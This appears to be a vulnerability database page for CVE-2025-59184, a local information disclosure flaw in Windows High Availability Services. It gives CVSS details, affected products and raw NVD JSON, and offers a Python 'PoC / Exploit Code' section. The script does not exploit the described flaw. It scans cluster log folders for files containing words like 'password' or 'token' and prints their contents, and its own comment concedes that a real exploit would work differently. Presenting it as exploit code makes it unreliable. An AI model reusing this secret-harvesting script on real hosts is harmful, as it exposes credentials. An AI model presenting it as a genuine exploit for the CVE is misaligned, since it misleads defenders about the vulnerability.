Security Vulnerability Report
CVE-2025-59184 CVSS 5.5 MEDIUM

Published: 2025-10-14 17:15:57
Last Modified: 2025-11-07 17:52:16

Description

Exposure of sensitive information to an unauthorized actor in Windows High Availability Services allows an authorized attacker to disclose information locally.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:* - VULNERABLE
Windows Server 2025 (Affected)
Windows Server 2022 (Affected)
Windows Server 2019 (Affected)
Windows Server 2016 (Affected)
Windows 11 Version 24H2 (Affected)
Windows 11 Version 23H2 (Affected)
Windows 10 Version 22H2 (Affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59184 - Windows High Availability Services Information Disclosure PoC
# This PoC demonstrates local information disclosure from WSFC service resources
# Requires: Local authenticated access with low privileges
import os
import sys
import ctypes
import struct


def check_wsfc_service():
    """Check if Windows High Availability Services are running"""
    try:
        import subprocess
        result = subprocess.run(
            ['sc', 'query', 'ClusSvc'],
            capture_output=True, text=True
        )
        return 'RUNNING' in result.stdout
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False


def enumerate_wsfc_artifacts():
    """Enumerate WSFC-related artifacts accessible to low-privilege users"""
    artifacts = []
    # Common WSFC log locations
    log_paths = [
        r"C:\Windows\Cluster\Reports",
        r"C:\Windows\Cluster\Logs",
    ]
    # Check shared memory segments (simplified)
    # In a real exploit, this would use NtOpenSection / MapViewOfFile
    print("[*] Scanning for WSFC service artifacts...")
    for path in log_paths:
        if os.path.exists(path):
            artifacts.append(path)
            print(f"[+] Found accessible path: {path}")
    return artifacts


def read_sensitive_info(artifact_path):
    """Attempt to read sensitive information from discovered artifacts"""
    try:
        # Attempt to read cluster log files for sensitive data
        if os.path.isdir(artifact_path):
            for root, dirs, files in os.walk(artifact_path):
                for file in files:
                    filepath = os.path.join(root, file)
                    try:
                        with open(filepath, 'r', errors='ignore') as f:
                            content = f.read()
                        # Look for sensitive patterns
                        if any(keyword in content.lower() for keyword in
                               ['password', 'credential', 'token', 'key', 'secret']):
                            print(f"[!] Sensitive data found in: {filepath}")
                            return content[:500]  # Return first 500 chars
                    except PermissionError:
                        pass
    except Exception as e:
        print(f"[-] Error reading artifact: {e}")
    return None


def main():
    print("=" * 60)
    print("CVE-2025-59184 - WSFC Information Disclosure PoC")
    print("=" * 60)
    if not check_wsfc_service():
        print("[-] WSFC service is not running. Exiting.")
        sys.exit(1)
    print("[+] WSFC service is running")
    artifacts = enumerate_wsfc_artifacts()
    if artifacts:
        for artifact in artifacts:
            sensitive_data = read_sensitive_info(artifact)
            if sensitive_data:
                print(f"\n[!] Extracted sensitive information:\n{sensitive_data}")
    else:
        print("[-] No accessible artifacts found")
    print("\n[*] PoC execution completed")


if __name__ == "__main__":
    main()

References

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59184 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59184", "sourceIdentifier": "[email protected]", "published": "2025-10-14T17:15:56.653", "lastModified": "2025-11-07T17:52:15.743", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of sensitive information to an unauthorized actor in Windows High Availability Services allows an authorized attacker to disclose information locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "versionEndIncluding": "10.0.14393.8519", "matchCriteriaId": "860ADFF9-62D0-425B-9310-99ACFC92EB12"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.7919", "matchCriteriaId": "20810926-AEC9-4C09-9C52-B4B8FADECF3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4294", "matchCriteriaId": "B1C1EA69-6BB8-4E59-8659-43581FDB48B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.1913", "matchCriteriaId": "370C12D6-90EF-44BE-8070-AA0080C12600"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndIncluding": 
"10.0.26100.6899", "matchCriteriaId": "CD6268EB-C42B-406F-B3FF-6E694F93BF41"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59184", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}